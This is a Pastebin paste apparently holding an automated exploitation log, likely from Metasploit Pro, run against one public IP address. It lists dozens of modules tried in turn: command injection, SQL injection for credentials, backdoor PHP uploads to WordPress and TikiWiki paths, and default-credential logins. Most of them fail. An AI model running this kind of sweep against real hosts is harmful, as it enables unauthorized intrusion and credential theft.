API tools faq
paste
vituong585

scan test

vituong585
Aug 17th, 2016
848
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 151.71 KB | None | 0 0
raw download clone embed print report
  1. [*] [2016.08.17-21:02:31] Minimum rank: excellent, transport evasion level: 0, application evasion level: 0
  2. [*] [2016.08.17-21:02:31] Target hosts: 166.62.27.177
  3. [+] [2016.08.17-21:02:31] Workspace:Seocam Progress:1/100 (1%) Starting analysis
  4. [+] [2016.08.17-21:02:31] Workspace:Seocam Progress:2/100 (2%) Analyzing exploits: filtering by vulnerability, port
  5. [+] [2016.08.17-21:02:41] Workspace:Seocam Progress:3/100 (3%) Building exploit map: matching by vulnerability, port
  6. [*] [2016.08.17-21:02:41] Matching exploits: 0 hosts processed (0 potential actions)
  7. [+] [2016.08.17-21:02:41] Workspace:Seocam Progress:4/100 (4%) Building attack plan
  8. [*] [2016.08.17-21:02:41] Finalizing attack plan: 332 total exploits
  9. [+] [2016.08.17-21:02:41] Workspace:Seocam Progress:5/337 (1%) [1/332] 166.62.27.177:80 - Watchguard XCS Remote Command Execution
  10. [+] [2016.08.17-21:02:42] Workspace:Seocam Progress:6/337 (1%) [2/332] 166.62.27.177:80 - eScan Web Management Console Command Injection
  11. [+] [2016.08.17-21:02:42] Workspace:Seocam Progress:7/337 (2%) [3/332] 166.62.27.177:80 - Simple Backdoor Shell Remote Code Execution
  12. [+] [2016.08.17-21:02:43] Workspace:Seocam Progress:8/337 (2%) [4/332] 166.62.27.177:80 - Microsoft SQL Server Payload Execution via SQL Injection
  13. [+] [2016.08.17-21:02:44] Workspace:Seocam Progress:9/337 (2%) [5/332] 166.62.27.177:80 - MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
  14. [*] [2016.08.17-21:02:48] Host 166.62.27.177 has 1 open ports, 0 closed ports, and 0 filtered ports
  15. [-] [2016.08.17-21:02:48] No bind payloads available for exploit/freebsd/http/watchguard_cmd_exec)
  16. [*] [2016.08.17-21:02:48] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  17. [*] [2016.08.17-21:02:48] Using a random high port (59013) for 166.62.27.177
  18. [-] [2016.08.17-21:02:49] Fatal: Could not select a callback port when bind connections are specified
  19. [-] [2016.08.17-21:02:49] No bind payloads available for exploit/multi/http/simple_backdoors_exec)
  20. [-] [2016.08.17-21:02:49] Fatal: Could not select a callback port when bind connections are specified
  21. [-] [2016.08.17-21:02:49] [0001] Exploit failed: A payload has not been selected.
  22. [-] [2016.08.17-21:02:49] [0003] Exploit failed: A payload has not been selected.
  23. [+] [2016.08.17-21:03:00] Workspace:Seocam Progress:10/337 (2%) [6/332] 166.62.27.177:80 - Apache Continuum Arbitrary Command Execution
  24. [+] [2016.08.17-21:03:01] Workspace:Seocam Progress:11/337 (3%) [7/332] 166.62.27.177:80 - ATutor 2.2.1 Directory Traversal / Remote Code Execution
  25. [+] [2016.08.17-21:03:01] Workspace:Seocam Progress:12/337 (3%) [8/332] 166.62.27.177:80 - SolarWinds Storage Manager Authentication Bypass
  26. [*] [2016.08.17-21:03:02] Using a random high port (30482) for 166.62.27.177
  27. [-] [2016.08.17-21:03:02] No bind payloads available for exploit/multi/http/solarwinds_store_manager_auth_filter)
  28. [*] [2016.08.17-21:03:02] Using a random high port (23641) for 166.62.27.177
  29. [-] [2016.08.17-21:03:02] [0008] Exploit failed: A payload has not been selected.
  30. [*] [2016.08.17-21:03:03] [0006] Started bind handler
  31. [*] [2016.08.17-21:03:03] [0007] Started bind handler
  32. [+] [2016.08.17-21:03:03] Workspace:Seocam Progress:13/337 (3%) [9/332] 166.62.27.177:80 - Centreon Web Useralias Command Execution
  33. [-] [2016.08.17-21:03:04] [0007] 166.62.27.177:80 - Exploit failed: NoMethodError undefined method `empty?' for nil:NilClass
  34. [-] [2016.08.17-21:03:04] No bind payloads available for exploit/linux/http/centreon_useralias_exec)
  35. [*] [2016.08.17-21:03:04] [0006] Injecting CmdStager payload...
  36. [-] [2016.08.17-21:03:04] [0009] Exploit failed: A payload has not been selected.
  37. [+] [2016.08.17-21:03:04] Workspace:Seocam Progress:14/337 (4%) [10/332] 166.62.27.177:80 - DD-WRT HTTP Daemon Arbitrary Command Execution
  38. [-] [2016.08.17-21:03:04] No bind payloads available for exploit/linux/http/ddwrt_cgibin_exec)
  39. [-] [2016.08.17-21:03:05] [0010] Exploit failed: A payload has not been selected.
  40. [+] [2016.08.17-21:03:05] Workspace:Seocam Progress:15/337 (4%) [11/332] 166.62.27.177:80 - Novell ZENworks Configuration Management Remote Execution
  41. [*] [2016.08.17-21:03:05] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  42. [*] [2016.08.17-21:03:05] [0006] Command Stager progress - 100.00% done (710/710 bytes)
  43. [*] [2016.08.17-21:03:05] Using a random high port (63043) for 166.62.27.177
  44. [*] [2016.08.17-21:03:06] Using a random high port (52782) for 166.62.27.177
  45. [+] [2016.08.17-21:03:07] Workspace:Seocam Progress:16/337 (4%) [12/332] 166.62.27.177:80 - phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
  46. [*] [2016.08.17-21:03:07] [0005] Started bind handler
  47. [*] [2016.08.17-21:03:07] Using a random high port (10527) for 166.62.27.177
  48. [*] [2016.08.17-21:03:07] [0005] Attempting automatic target detection...
  49. [*] [2016.08.17-21:03:07] [0005] select @@version
  50. [-] [2016.08.17-21:03:07] [0005] Exploit aborted due to failure: no-target: The SQL injection parameter was not specified in the GET path
  51. [*] [2016.08.17-21:03:07] [0012] Started bind handler
  52. [*] [2016.08.17-21:03:08] Using a random high port (57824) for 166.62.27.177
  53. [*] [2016.08.17-21:03:08] [0012] Sending request for: /phpscheduleit/
  54. [*] [2016.08.17-21:03:08] [0012] Payload embedded in header: X-WWAPEVALKCSTWK
  55. [*] [2016.08.17-21:03:08] [0004] Started bind handler
  56. [-] [2016.08.17-21:03:09] [0012] Server returned a non-200 status code: (404)
  57. [*] [2016.08.17-21:03:10] [0004] Warning: This module will leave VIFfzZeB.exe in the SQL Server %TEMP% directory
  58. [*] [2016.08.17-21:03:10] [0004] Writing the debug.com loader to the disk...
  59. [-] [2016.08.17-21:03:10] [0004] Exploit aborted due to failure: no-target: The SQL injection parameter was not specified in the GET path
  60. [-] [2016.08.17-21:03:10] [0011] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
  61. [+] [2016.08.17-21:03:10] Workspace:Seocam Progress:17/337 (5%) [13/332] 166.62.27.177:80 - XAMPP WebDAV PHP Upload
  62. [*] [2016.08.17-21:03:10] Using a random high port (31263) for 166.62.27.177
  63. [*] [2016.08.17-21:03:10] [0013] Started bind handler
  64. [*] [2016.08.17-21:03:10] [0013] Uploading Payload to /webdav/GdwMhod.php
  65. [+] [2016.08.17-21:03:11] Workspace:Seocam Progress:18/337 (5%) [14/332] 166.62.27.177:80 - Apache Tomcat Manager Application Deployer Authenticated Code Execution
  66. [*] [2016.08.17-21:03:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  67. [*] [2016.08.17-21:03:11] Using a random high port (37368) for 166.62.27.177
  68. [-] [2016.08.17-21:03:11] [0014] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  69. [+] [2016.08.17-21:03:11] Workspace:Seocam Progress:19/337 (5%) [15/332] 166.62.27.177:80 - Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload
  70. [*] [2016.08.17-21:03:11] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  71. [*] [2016.08.17-21:03:11] Using a random high port (22201) for 166.62.27.177
  72. [-] [2016.08.17-21:03:11] [0013] Failed to upload file!
  73. [+] [2016.08.17-21:03:12] Workspace:Seocam Progress:20/337 (5%) [16/332] 166.62.27.177:80 - Apache Tomcat Manager Authenticated Upload Code Execution
  74. [*] [2016.08.17-21:03:12] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  75. [*] [2016.08.17-21:03:12] [0015] Started bind handler
  76. [*] [2016.08.17-21:03:12] Using a random high port (33810) for 166.62.27.177
  77. [-] [2016.08.17-21:03:12] [0016] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  78. [+] [2016.08.17-21:03:12] Workspace:Seocam Progress:21/337 (6%) [17/332] 166.62.27.177:80 - phpFileManager 0.9.8 Remote Code Execution
  79. [-] [2016.08.17-21:03:12] No bind payloads available for exploit/multi/http/phpfilemanager_rce)
  80. [-] [2016.08.17-21:03:12] [0017] Exploit failed: A payload has not been selected.
  81. [+] [2016.08.17-21:03:13] Workspace:Seocam Progress:22/337 (6%) [18/332] 166.62.27.177:80 - Werkzeug Debug Shell Command Execution
  82. [-] [2016.08.17-21:03:13] No bind payloads available for exploit/multi/http/werkzeug_debug_rce)
  83. [-] [2016.08.17-21:03:13] [0018] Exploit failed: A payload has not been selected.
  84. [+] [2016.08.17-21:03:13] Workspace:Seocam Progress:23/337 (6%) [19/332] 166.62.27.177:80 - ColdFusion 8.0.1 Arbitrary File Upload and Execute
  85. [-] [2016.08.17-21:03:13] No bind payloads available for exploit/windows/http/coldfusion_fckeditor)
  86. [-] [2016.08.17-21:03:13] [0019] Exploit failed: A payload has not been selected.
  87. [+] [2016.08.17-21:03:13] Workspace:Seocam Progress:24/337 (7%) [20/332] 166.62.27.177:80 - PHP Utility Belt Remote Code Execution
  88. [*] [2016.08.17-21:03:14] Using a random high port (52603) for 166.62.27.177
  89. [-] [2016.08.17-21:03:14] [0015] Exploit aborted due to failure: not-vulnerable: Target does not have voice-servlet
  90. [*] [2016.08.17-21:03:14] [0020] Started bind handler
  91. [+] [2016.08.17-21:03:14] Workspace:Seocam Progress:25/337 (7%) [21/332] 166.62.27.177:80 - IPFire proxy.cgi RCE
  92. [-] [2016.08.17-21:03:14] No bind payloads available for exploit/linux/http/ipfire_proxy_exec)
  93. [-] [2016.08.17-21:03:14] [0021] Exploit failed: A payload has not been selected.
  94. [+] [2016.08.17-21:03:14] Workspace:Seocam Progress:26/337 (7%) [22/332] 166.62.27.177:80 - LifeSize UVC Authenticated RCE via Ping
  95. [-] [2016.08.17-21:03:14] No bind payloads available for exploit/linux/http/lifesize_uvc_ping_rce)
  96. [-] [2016.08.17-21:03:14] [0022] Exploit failed: A payload has not been selected.
  97. [+] [2016.08.17-21:03:15] Workspace:Seocam Progress:27/337 (8%) [23/332] 166.62.27.177:80 - X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution
  98. [*] [2016.08.17-21:03:15] Using a random high port (60682) for 166.62.27.177
  99. [+] [2016.08.17-21:03:26] Workspace:Seocam Progress:28/337 (8%) [24/332] 166.62.27.177:80 - Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
  100. [-] [2016.08.17-21:03:26] No bind payloads available for exploit/windows/http/adobe_robohelper_authbypass)
  101. [-] [2016.08.17-21:03:26] [0024] Exploit failed: A payload has not been selected.
  102. [+] [2016.08.17-21:03:26] Workspace:Seocam Progress:29/337 (8%) [25/332] 166.62.27.177:80 - ZeroShell Remote Code Execution
  103. [*] [2016.08.17-21:03:26] Using a random high port (28309) for 166.62.27.177
  104. [+] [2016.08.17-21:03:27] Workspace:Seocam Progress:30/337 (8%) [26/332] 166.62.27.177:80 - Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
  105. [*] [2016.08.17-21:03:27] [0025] Started bind handler
  106. [*] [2016.08.17-21:03:27] Using a random high port (32686) for 166.62.27.177
  107. [*] [2016.08.17-21:03:27] [0026] Started bind handler
  108. [*] [2016.08.17-21:03:27] [0025] Retrieving cleartext admin password
  109. [*] [2016.08.17-21:03:27] [0026] Uploading payload to /wp-content/uploads/wysija/themes/pPMmfqVeDJ/tsgKdBFSHm.php
  110. [+] [2016.08.17-21:03:27] Workspace:Seocam Progress:31/337 (9%) [27/332] 166.62.27.177:80 - Nagios XI Chained Remote Code Execution
  111. [-] [2016.08.17-21:03:27] No bind payloads available for exploit/linux/http/nagios_xi_chained_rce)
  112. [*] [2016.08.17-21:03:27] [0027] Started reverse TCP handler on 192.168.100.20:4444
  113. [+] [2016.08.17-21:03:27] Workspace:Seocam Progress:32/337 (9%) [28/332] 166.62.27.177:80 - op5 v7.1.9 Configuration Command Execution
  114. [*] [2016.08.17-21:03:28] Using a random high port (53622) for 166.62.27.177
  115. [-] [2016.08.17-21:03:28] [0025] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Retrieving password failed!
  116. [-] [2016.08.17-21:03:28] [0026] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  117. [*] [2016.08.17-21:03:28] [0028] Started bind handler
  118. [+] [2016.08.17-21:03:28] Workspace:Seocam Progress:33/337 (9%) [29/332] 166.62.27.177:80 - Wordpress WPTouch Authenticated File Upload
  119. [-] [2016.08.17-21:03:28] [0027] Exploit aborted due to failure: not-vulnerable: Vulnerable version not found! punt!
  120. [*] [2016.08.17-21:03:28] Using a random high port (6202) for 166.62.27.177
  121. [+] [2016.08.17-21:03:29] Workspace:Seocam Progress:34/337 (10%) [30/332] 166.62.27.177:80 - Pandora FMS Remote Code Execution
  122. [-] [2016.08.17-21:03:29] No bind payloads available for exploit/linux/http/pandora_fms_exec)
  123. [-] [2016.08.17-21:03:29] [0030] Exploit failed: A payload has not been selected.
  124. [+] [2016.08.17-21:03:29] Workspace:Seocam Progress:35/337 (10%) [31/332] 166.62.27.177:80 - Pandora FMS Default Credential / SQLi Remote Code Execution
  125. [*] [2016.08.17-21:03:29] Using a random high port (15054) for 166.62.27.177
  126. [*] [2016.08.17-21:03:29] [0031] Started bind handler
  127. [*] [2016.08.17-21:03:29] [0031] Attempting to authenticate using (admin:pandora)
  128. [+] [2016.08.17-21:03:29] Workspace:Seocam Progress:36/337 (10%) [32/332] 166.62.27.177:80 - WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
  129. [*] [2016.08.17-21:03:30] Using a random high port (44552) for 166.62.27.177
  130. [*] [2016.08.17-21:03:30] [0032] Started bind handler
  131. [+] [2016.08.17-21:03:30] Workspace:Seocam Progress:37/337 (10%) [33/332] 166.62.27.177:80 - Wordpress Work The Flow Upload Vulnerability
  132. [*] [2016.08.17-21:03:30] Using a random high port (32895) for 166.62.27.177
  133. [*] [2016.08.17-21:03:30] [0033] Started bind handler
  134. [-] [2016.08.17-21:03:30] [0031] Authentication failed!
  135. [*] [2016.08.17-21:03:30] [0031] Attempting to extract auto login hash via SQLi
  136. [+] [2016.08.17-21:03:30] Workspace:Seocam Progress:38/337 (11%) [34/332] 166.62.27.177:80 - WordPress Platform Theme File Upload Vulnerability
  137. [-] [2016.08.17-21:03:30] [0028] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: unknown protocol
  138. [*] [2016.08.17-21:03:30] Using a random high port (14410) for 166.62.27.177
  139. [-] [2016.08.17-21:03:30] [0032] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  140. [*] [2016.08.17-21:03:31] [0034] Started bind handler
  141. [*] [2016.08.17-21:03:31] [0034] Uploading payload
  142. [+] [2016.08.17-21:03:31] Workspace:Seocam Progress:39/337 (11%) [35/332] 166.62.27.177:80 - RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
  143. [-] [2016.08.17-21:03:31] No bind payloads available for exploit/linux/http/piranha_passwd_exec)
  144. [-] [2016.08.17-21:03:31] [0035] Exploit failed: A payload has not been selected.
  145. [-] [2016.08.17-21:03:31] [0033] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  146. [+] [2016.08.17-21:03:31] Workspace:Seocam Progress:40/337 (11%) [36/332] 166.62.27.177:80 - Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution
  147. [-] [2016.08.17-21:03:31] No bind payloads available for exploit/linux/http/sophos_wpa_iface_exec)
  148. [-] [2016.08.17-21:03:31] [0034] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
  149. [+] [2016.08.17-21:03:32] Workspace:Seocam Progress:41/337 (12%) [37/332] 166.62.27.177:80 - Wordpress N-Media Website Contact Form Upload Vulnerability
  150. [*] [2016.08.17-21:03:32] Using a random high port (47818) for 166.62.27.177
  151. [*] [2016.08.17-21:03:32] [0037] Started bind handler
  152. [+] [2016.08.17-21:03:32] Workspace:Seocam Progress:42/337 (12%) [38/332] 166.62.27.177:80 - WordPress cache_lastpostdate Arbitrary Code Execution
  153. [-] [2016.08.17-21:03:32] No bind payloads available for exploit/unix/webapp/wp_lastpost_exec)
  154. [-] [2016.08.17-21:03:32] [0038] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  155. [+] [2016.08.17-21:03:33] Workspace:Seocam Progress:43/337 (12%) [39/332] 166.62.27.177:80 - WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
  156. [*] [2016.08.17-21:03:33] Using a random high port (50278) for 166.62.27.177
  157. [-] [2016.08.17-21:03:33] [0037] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  158. [*] [2016.08.17-21:03:33] [0039] Started bind handler
  159. [*] [2016.08.17-21:03:33] [0039] Sending PHP payload
  160. [+] [2016.08.17-21:03:33] Workspace:Seocam Progress:44/337 (13%) [40/332] 166.62.27.177:80 - Wordpress Download Manager (download-manager) Unauthenticated File Upload
  161. [*] [2016.08.17-21:03:33] Using a random high port (65093) for 166.62.27.177
  162. [*] [2016.08.17-21:03:33] [0040] Started bind handler
  163. [*] [2016.08.17-21:03:33] [0040] Uploading payload
  164. [+] [2016.08.17-21:03:33] Workspace:Seocam Progress:45/337 (13%) [41/332] 166.62.27.177:80 - Wordpress Ajax Load More PHP Upload Vulnerability
  165. [*] [2016.08.17-21:03:33] Using a random high port (49495) for 166.62.27.177
  166. [-] [2016.08.17-21:03:34] [0039] File wasn't uploaded, aborting!
  167. [+] [2016.08.17-21:03:34] Workspace:Seocam Progress:46/337 (13%) [42/332] 166.62.27.177:80 - WordPress Admin Shell Upload
  168. [*] [2016.08.17-21:03:34] Using a random high port (20752) for 166.62.27.177
  169. [+] [2016.08.17-21:03:34] Workspace:Seocam Progress:47/337 (13%) [43/332] 166.62.27.177:80 - TWiki Search Function Arbitrary Command Execution
  170. [-] [2016.08.17-21:03:34] No bind payloads available for exploit/unix/webapp/twiki_search)
  171. [-] [2016.08.17-21:03:34] [0043] Exploit failed: A payload has not been selected.
  172. [+] [2016.08.17-21:03:35] Workspace:Seocam Progress:48/337 (14%) [44/332] 166.62.27.177:80 - TWiki History TWikiUsers rev Parameter Command Execution
  173. [-] [2016.08.17-21:03:35] No bind payloads available for exploit/unix/webapp/twiki_history)
  174. [-] [2016.08.17-21:03:35] [0044] Exploit failed: A payload has not been selected.
  175. [-] [2016.08.17-21:03:35] [0040] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Error on uploading file
  176. [+] [2016.08.17-21:03:35] Workspace:Seocam Progress:49/337 (14%) [45/332] 166.62.27.177:80 - Tiki-Wiki CMS Calendar Command Execution
  177. [*] [2016.08.17-21:03:35] Using a random high port (34903) for 166.62.27.177
  178. [*] [2016.08.17-21:03:35] [0045] Started bind handler
  179. [+] [2016.08.17-21:03:35] Workspace:Seocam Progress:50/337 (14%) [46/332] 166.62.27.177:80 - Zemra Botnet CnC Web Panel Remote Code Execution
  180. [-] [2016.08.17-21:03:36] No bind payloads available for exploit/multi/http/zemra_panel_rce)
  181. [-] [2016.08.17-21:03:36] [0046] Exploit failed: A payload has not been selected.
  182. [+] [2016.08.17-21:03:36] Workspace:Seocam Progress:51/337 (15%) [47/332] 166.62.27.177:80 - Tiki Wiki Unauthenticated File Upload Vulnerability
  183. [*] [2016.08.17-21:03:36] Using a random high port (1537) for 166.62.27.177
  184. [-] [2016.08.17-21:03:36] [0045] Exploit aborted due to failure: unknown: Target does not have tiki-login_scr.php
  185. [*] [2016.08.17-21:03:36] [0047] Started bind handler
  186. [+] [2016.08.17-21:03:36] Workspace:Seocam Progress:52/337 (15%) [48/332] 166.62.27.177:80 - TikiWiki jhot Remote Command Execution
  187. [*] [2016.08.17-21:03:36] [0047] Uploading backdoor file: TMDJgzXct.php
  188. [-] [2016.08.17-21:03:36] No bind payloads available for exploit/unix/webapp/tikiwiki_jhot_exec)
  189. [-] [2016.08.17-21:03:36] [0048] Exploit failed: A payload has not been selected.
  190. [+] [2016.08.17-21:03:37] Workspace:Seocam Progress:53/337 (15%) [49/332] 166.62.27.177:80 - TikiWiki tiki-graph_formula Remote PHP Code Execution
  191. [*] [2016.08.17-21:03:37] Using a random high port (44392) for 166.62.27.177
  192. [-] [2016.08.17-21:03:37] [0047] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Error on uploading file
  193. [*] [2016.08.17-21:03:37] [0049] Started bind handler
  194. [*] [2016.08.17-21:03:37] [0049] Attempting to obtain database credentials...
  195. [!] [2016.08.17-21:03:37] [0047] This exploit may require manual cleanup of 'TMDJgzXct.php' on the target
  196. [+] [2016.08.17-21:03:37] Workspace:Seocam Progress:54/337 (16%) [50/332] 166.62.27.177:80 - Simple PHP Blog Remote Command Execution
  197. [*] [2016.08.17-21:03:37] Using a random high port (52345) for 166.62.27.177
  198. [*] [2016.08.17-21:03:37] [0050] Started bind handler
  199. [+] [2016.08.17-21:03:38] Workspace:Seocam Progress:55/337 (16%) [51/332] 166.62.27.177:80 - Simple E-Document Arbitrary File Upload
  200. [*] [2016.08.17-21:03:38] Using a random high port (48741) for 166.62.27.177
  201. [*] [2016.08.17-21:03:38] [0051] Started bind handler
  202. [*] [2016.08.17-21:03:38] [0051] Uploading PHP payload...
  203. [+] [2016.08.17-21:03:38] Workspace:Seocam Progress:56/337 (16%) [52/332] 166.62.27.177:80 - SePortal SQLi Remote Code Execution
  204. [*] [2016.08.17-21:03:38] Using a random high port (9469) for 166.62.27.177
  205. [*] [2016.08.17-21:03:38] [0052] Started bind handler
  206. [-] [2016.08.17-21:03:38] [0050] Exploit aborted due to failure: not-vulnerable: Failed to retrieve hash, server may not be vulnerable.
  207. [*] [2016.08.17-21:03:38] [0052] Logging in as user [ test ]
  208. [+] [2016.08.17-21:03:39] Workspace:Seocam Progress:57/337 (16%) [53/332] 166.62.27.177:80 - Ubiquiti airOS Arbitrary File Upload
  209. [-] [2016.08.17-21:03:39] No bind payloads available for exploit/linux/ssh/ubiquiti_airos_file_upload)
  210. [-] [2016.08.17-21:03:39] [0053] Exploit failed: A payload has not been selected.
  211. [+] [2016.08.17-21:03:39] Workspace:Seocam Progress:58/337 (17%) [54/332] 166.62.27.177:80 - QuickTime Streaming Server parse_xml.cgi Remote Execution
  212. [-] [2016.08.17-21:03:39] No bind payloads available for exploit/unix/webapp/qtss_parse_xml_exec)
  213. [-] [2016.08.17-21:03:39] [0054] Exploit failed: A payload has not been selected.
  214. [+] [2016.08.17-21:03:40] Workspace:Seocam Progress:59/337 (17%) [55/332] 166.62.27.177:80 - ProjectSend Arbitrary File Upload
  215. [*] [2016.08.17-21:03:40] Using a random high port (38431) for 166.62.27.177
  216. [*] [2016.08.17-21:03:40] [0055] Started bind handler
  217. [*] [2016.08.17-21:03:40] [0055] Uploading file 'TtLRps.php' (1618 bytes)
  218. [-] [2016.08.17-21:03:41] [0052] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Login was not succesful!
  219. [-] [2016.08.17-21:03:41] [0051] Exploit aborted due to failure: not-found: 166.62.27.177:80 - No upload.php found
  220. [-] [2016.08.17-21:03:41] [0055] Exploit aborted due to failure: not-found: 166.62.27.177:80 - No process-upload.php found
  221. [+] [2016.08.17-21:03:41] Workspace:Seocam Progress:60/337 (17%) [56/332] 166.62.27.177:80 - PhpMyAdmin Config File Code Injection
  222. [*] [2016.08.17-21:03:41] Using a random high port (12991) for 166.62.27.177
  223. [*] [2016.08.17-21:03:41] [0056] Started bind handler
  224. [*] [2016.08.17-21:03:41] [0056] Grabbing session cookie and CSRF token
  225. [+] [2016.08.17-21:03:42] Workspace:Seocam Progress:61/337 (18%) [57/332] 166.62.27.177:80 - AjaXplorer checkInstall.php Remote Command Execution
  226. [-] [2016.08.17-21:03:42] No bind payloads available for exploit/multi/http/ajaxplorer_checkinstall_exec)
  227. [-] [2016.08.17-21:03:42] [0057] Exploit failed: A payload has not been selected.
  228. [+] [2016.08.17-21:03:42] Workspace:Seocam Progress:62/337 (18%) [58/332] 166.62.27.177:80 - phpBB viewtopic.php Arbitrary Code Execution
  229. [-] [2016.08.17-21:03:42] No bind payloads available for exploit/unix/webapp/phpbb_highlight)
  230. [-] [2016.08.17-21:03:42] [0058] Exploit failed: A payload has not been selected.
  231. [-] [2016.08.17-21:03:42] [0056] Exploit aborted due to failure: not-found: Couldn't find token and can't continue without it. Is URI set correctly?
  232. [+] [2016.08.17-21:03:42] Workspace:Seocam Progress:63/337 (18%) [59/332] 166.62.27.177:80 - PHP XML-RPC Arbitrary Code Execution
  233. [-] [2016.08.17-21:03:42] No bind payloads available for exploit/unix/webapp/php_xmlrpc_eval)
  234. [-] [2016.08.17-21:03:42] [0059] Exploit failed: A payload has not been selected.
  235. [*] [2016.08.17-21:03:43] [0049] No response from the server
  236. [*] [2016.08.17-21:03:43] [0049] Attempting to execute our payload...
  237. [+] [2016.08.17-21:03:43] Workspace:Seocam Progress:64/337 (18%) [60/332] 166.62.27.177:80 - vBulletin misc.php Template Name Arbitrary Code Execution
  238. [-] [2016.08.17-21:03:43] No bind payloads available for exploit/unix/webapp/php_vbulletin_template)
  239. [-] [2016.08.17-21:03:43] [0060] Exploit failed: A payload has not been selected.
  240. [+] [2016.08.17-21:03:43] Workspace:Seocam Progress:65/337 (19%) [61/332] 166.62.27.177:80 - PAJAX Remote Command Execution
  241. [*] [2016.08.17-21:03:43] Using a random high port (58078) for 166.62.27.177
  242. [*] [2016.08.17-21:03:43] [0061] Started bind handler
  243. [+] [2016.08.17-21:03:44] Workspace:Seocam Progress:66/337 (19%) [62/332] 166.62.27.177:80 - osCommerce 2.2 Arbitrary PHP Code Execution
  244. [*] [2016.08.17-21:03:44] Using a random high port (47038) for 166.62.27.177
  245. [*] [2016.08.17-21:03:44] [0062] Started bind handler
  246. [*] [2016.08.17-21:03:44] [0062] Sending file save request
  247. [+] [2016.08.17-21:03:44] Workspace:Seocam Progress:67/337 (19%) [63/332] 166.62.27.177:80 - AWStats migrate Remote Command Execution
  248. [-] [2016.08.17-21:03:44] No bind payloads available for exploit/unix/webapp/awstats_migrate_exec)
  249. [-] [2016.08.17-21:03:44] [0063] Exploit failed: A payload has not been selected.
  250. [*] [2016.08.17-21:03:44] [0061] 166.62.27.177:80 - The server returned: 404 Not Found
  251. [+] [2016.08.17-21:03:45] Workspace:Seocam Progress:68/337 (20%) [64/332] 166.62.27.177:80 - CMS Bolt File Upload Vulnerability
  252. [*] [2016.08.17-21:03:45] Using a random high port (1285) for 166.62.27.177
  253. [+] [2016.08.17-21:03:45] Workspace:Seocam Progress:69/337 (20%) [65/332] 166.62.27.177:80 - China Chopper Caidao PHP Backdoor Code Execution
  254. [*] [2016.08.17-21:03:45] Using a random high port (40703) for 166.62.27.177
  255. [*] [2016.08.17-21:03:45] [0065] Started bind handler
  256. [*] [2016.08.17-21:03:46] [0065] Sending exploit...
  257. [+] [2016.08.17-21:03:46] Workspace:Seocam Progress:70/337 (20%) [66/332] 166.62.27.177:80 - Wyse Rapport Hagent Fake Hserver Command Execution
  258. [*] [2016.08.17-21:03:46] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  259. [*] [2016.08.17-21:03:47] Using a random high port (49933) for 166.62.27.177
  260. [-] [2016.08.17-21:03:47] Fatal: Could not select a callback port when bind connections are specified
  261. [*] [2016.08.17-21:03:47] [0066] Started bind handler
  262. [*] [2016.08.17-21:03:47] [0066] 166.62.27.177:80 - Connecting to the target
  263. [+] [2016.08.17-21:03:47] Workspace:Seocam Progress:71/337 (21%) [67/332] 166.62.27.177:80 - OpenX banner-edit.php File Upload PHP Code Execution
  264. [-] [2016.08.17-21:03:47] No bind payloads available for exploit/unix/webapp/openx_banner_edit)
  265. [*] [2016.08.17-21:03:47] [0062] Requesting our payload
  266. [*] [2016.08.17-21:03:47] [0066] 166.62.27.177:80 - Starting the FTP server
  267. [*] [2016.08.17-21:03:47] [0066] 166.62.27.177:80 - Generating the EXE
  268. [+] [2016.08.17-21:03:48] Workspace:Seocam Progress:72/337 (21%) [68/332] 166.62.27.177:80 - HP Openview connectedNodes.ovpl Remote Command Execution
  269. [-] [2016.08.17-21:03:48] No bind payloads available for exploit/unix/webapp/openview_connectednodes_exec)
  270. [-] [2016.08.17-21:03:49] [0068] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  271. [+] [2016.08.17-21:03:49] Workspace:Seocam Progress:73/337 (21%) [69/332] 166.62.27.177:80 - Dexter (CasinoLoader) SQL Injection
  272. [*] [2016.08.17-21:03:50] [0066] 166.62.27.177:80 - Starting the HTTP service
  273. [*] [2016.08.17-21:03:50] [0066] 166.62.27.177:80 - Starting the HTTP service on port 41731
  274. [*] [2016.08.17-21:03:50] Using a random high port (46818) for 166.62.27.177
  275. [*] [2016.08.17-21:03:50] [0069] Started bind handler
  276. [*] [2016.08.17-21:03:50] [0069] Using SQL injection to acquire credentials
  277. [+] [2016.08.17-21:03:50] Workspace:Seocam Progress:74/337 (21%) [70/332] 166.62.27.177:80 - Nagios3 statuswml.cgi Ping Command Execution
